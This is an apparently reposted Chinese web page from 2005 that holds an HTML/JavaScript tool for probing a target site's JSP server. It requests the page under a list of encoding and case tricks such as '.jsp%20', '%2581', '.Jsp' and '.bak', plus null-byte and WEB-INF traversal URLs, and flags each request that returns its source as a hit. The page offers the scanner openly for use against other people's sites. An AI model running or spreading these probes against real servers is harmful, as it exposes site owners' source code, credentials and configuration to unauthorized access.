分享

暴jsp源码的网页

 intruder 2005-11-30
<base target=_blank><style>
BODY {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
BR {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
TD {FONT-FAMILY: "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt}
a {COLOR: #llccxx; text-decoration: none}
a:hover {color:#llccxx;text-decoration:none}
</style>
<center>
<pre>海阳顶端网jsp暴源码及目录网页使用帮助:
第一个写域名;第二个写路径;第三个写文件名,注意不要加扩展名:
</pre>
<input id=http style="BORDER-RIGHT: #99ccdd 1px solid; BORDER-TOP: #99ccdd 1px solid; BORDER-LEFT: #99ccdd 1px solid; BORDER-BOTTOM: #99ccdd 1px solid" size=28 value=http://www.> <input id=path style="BORDER-RIGHT: #99ccdd 1px solid; BORDER-TOP: #99ccdd 1px solid; BORDER-LEFT: #99ccdd 1px solid; BORDER-BOTTOM: #99ccdd 1px solid" size=36 value=/cgi-bin/ctm/jsp/cn/NHS/demo/> <input id=cindex style="BORDER-RIGHT: #99ccdd 1px solid; BORDER-TOP: #99ccdd 1px solid; BORDER-LEFT: #99ccdd 1px solid; BORDER-BOTTOM: #99ccdd 1px solid" size=6 value=main> <input style="BORDER-RIGHT: #99ccdd 1px solid; BORDER-TOP: #99ccdd 1px solid; BORDER-LEFT: #99ccdd 1px solid; BORDER-BOTTOM: #99ccdd 1px solid" onclick=isExist(http.value) type=button value=检测JSP源码及目录遍历>
<div id=t></div>
<SCRIPT>
function isExist(url)
{
var myObject = new Object();
myObject.lcx1 = ".jsp.";
myObject.lcx2 = ".jsp+";
myObject.lcx3 = ".jsp%20";
myObject.lcx4 = ".jsp%2e";
myObject.lcx5 = ".jsp%70";
myObject.lcx6 = ".jsp%81";
myObject.lcx7 = ".jsp%2581";
myObject.lcx8 = ".JSP";
myObject.lcx9 = ".Jsp";
myObject.lcx10 = ".jsp.bak";
t.innerHTML+= "<br>目录遍历的方法,暂且收了这么多:<br><br>"
t.innerHTML+= "<a href=" +http.value+path.value+" href_cetemp=" +http.value+path.value+">"+http.value+path.value+"<br>";
t.innerHTML+= "<a href=" +http.value+path.value+" href_cetemp=" +http.value+path.value+"%00.jsp>"+http.value+path.value+"%00.jsp<br>";
t.innerHTML+= "<a href=" +http.value+path.value+" href_cetemp=" +http.value+path.value+"%3f.jsp>"+http.value+path.value+"%3f.jsp<br>";
t.innerHTML+= "<a href=" +http.value+path.value+" href_cetemp=" +http.value+path.value+"?.jsp>"+http.value+path.value+"?.jsp<br>";
t.innerHTML+= "<a href=" +http.value+path.value+" href_cetemp=" +http.value+path.value+"web_inf>"+http.value+path.value+"web_inf/<br><br>";
t.innerHTML+= "估计以下有个链接肯定存在暴源码或出错漏洞,俺可不是瞎说,没有漏洞俺不列,下雨阴天闲着也是闲着,挨个点一下看看吧:<br><br>";
for (lcx in myObject)
{
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
xmlhttp.open("GET",http.value+path.value+cindex.value+myObject[lcx],false)
xmlhttp.send()
if(xmlhttp.status==200)
t.innerHTML += "<font color=red><a href="+http.value+path.value+cindex.value+myObject[lcx]+" href_cetemp="+http.value+path.value+cindex.value+myObject[lcx]+">"+http.value+path.value+cindex.value+myObject[lcx]+"<br></font></a>";
else
t.innerHTML+= http.value+path.value+cindex.value+myObject[lcx]+"你白费心了,俺不存在漏洞,不用点<br>";
}
}
</SCRIPT></center>

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多